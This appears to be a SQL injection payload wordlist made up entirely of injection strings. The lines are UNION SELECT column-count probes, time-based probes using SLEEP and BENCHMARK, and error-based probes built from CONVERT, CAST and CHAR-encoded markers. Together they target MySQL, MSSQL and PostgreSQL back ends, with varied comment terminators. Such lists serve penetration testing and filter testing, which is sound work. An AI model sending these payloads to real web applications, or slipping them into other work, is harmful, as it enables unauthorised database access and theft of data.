 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30
 UNION SELECT @@VERSION,SLEEP(5),"'3
 UNION SELECT @@VERSION,SLEEP(5),"'3'"#
 UNION SELECT @@VERSION,SLEEP(5),USER(),4#
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5#
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6#
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7#
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8#
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9#
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10#
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11#
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12#
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13#
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14#
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15#
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16#
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17#
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18#
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19#
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20#
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21#
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22#
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23#
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24#
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25#
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26#
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27#
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28#
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29#
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30#
 UNION ALL SELECT USER()-- 
 UNION ALL SELECT SLEEP(5)-- 
 UNION ALL SELECT USER(),SLEEP(5)-- 
 UNION ALL SELECT @@VERSION,USER(),SLEEP(5)-- 
 UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A'))-- 
 UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL-- 
 UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL-- 
 UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL-- 
 UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL-- 
 UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL-- 
 UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL-- 
 UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
 UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
 UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
 UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
 UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
 UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
 UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
 UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
 UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
 UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
 UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
 UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
 UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
 UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
 UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
 UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
 UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
 UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
 UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
 UNION ALL SELECT NULL-- 
 AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)))-- 
 AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)))-- 
 AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)))-- 
 AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))-- 
 AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))-- 
 AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))-- 
 AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)))-- 
 AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)))-- 
 AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)))-- 
 AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)))-- 
 AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)))-- 
 AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)))-- 
 AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)))-- 
 AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)))-- 
 AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)))-- 
 AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)))-- 
 AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)))-- 
 AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)))-- 
 AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)+CHAR(113)))-- 
 UNION ALL SELECT NULL#
 AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)))#
 AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)))#
 AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)))#
 AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))#
 AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))#
 AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))#
 AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)))#
 AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)))#
 AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)))#
 AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)))#
 AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)))#
 AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)))#
 AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)))#
 AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)))#
 AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)))#
 AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)))#
 AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)))#
 AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)))#
 AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)+CHAR(113)))#
 UNION ALL SELECT NULL 
 AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)))
 AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)))
 AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)))
 AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))
 AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))
 AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))
 AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)))
 AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)))
 AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)))
 AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)))
 AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)))
 AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)))
 AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)))
 AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)))
 AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)))
 AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)))
 AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)))
 AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)))
 AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)+CHAR(113)))
 AND 5650=CONVERT(INT,(SELECT CHAR(113)+CHAR(106)+CHAR(122)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (5650=5650) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)+CHAR(113)))
 AND 3516=CAST((CHR(113)||CHR(106)||CHR(122)||CHR(106)||CHR(113))||(SELECT (CASE WHEN (3516=3516) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(112)||CHR(106)||CHR(107)||CHR(113)) AS NUMERIC)
 AND (SELECT 4523 FROM(SELECT COUNT(*),CONCAT(0x716a7a6a71,(SELECT (ELT(4523=4523,1))),0x71706a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
 UNION ALL SELECT CHAR(113)+CHAR(106)+CHAR(122)+CHAR(106)+CHAR(113)+CHAR(110)+CHAR(106)+CHAR(99)+CHAR(73)+CHAR(66)+CHAR(109)+CHAR(119)+CHAR(81)+CHAR(108)+CHAR(88)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)+CHAR(113),NULL-- 
 UNION ALL SELECT 'INJ'||'ECT'||'XXX'
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30
 UNION ALL SELECT 'INJ'||'ECT'||'XXX'-- 
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2-- 
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3-- 
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4-- 
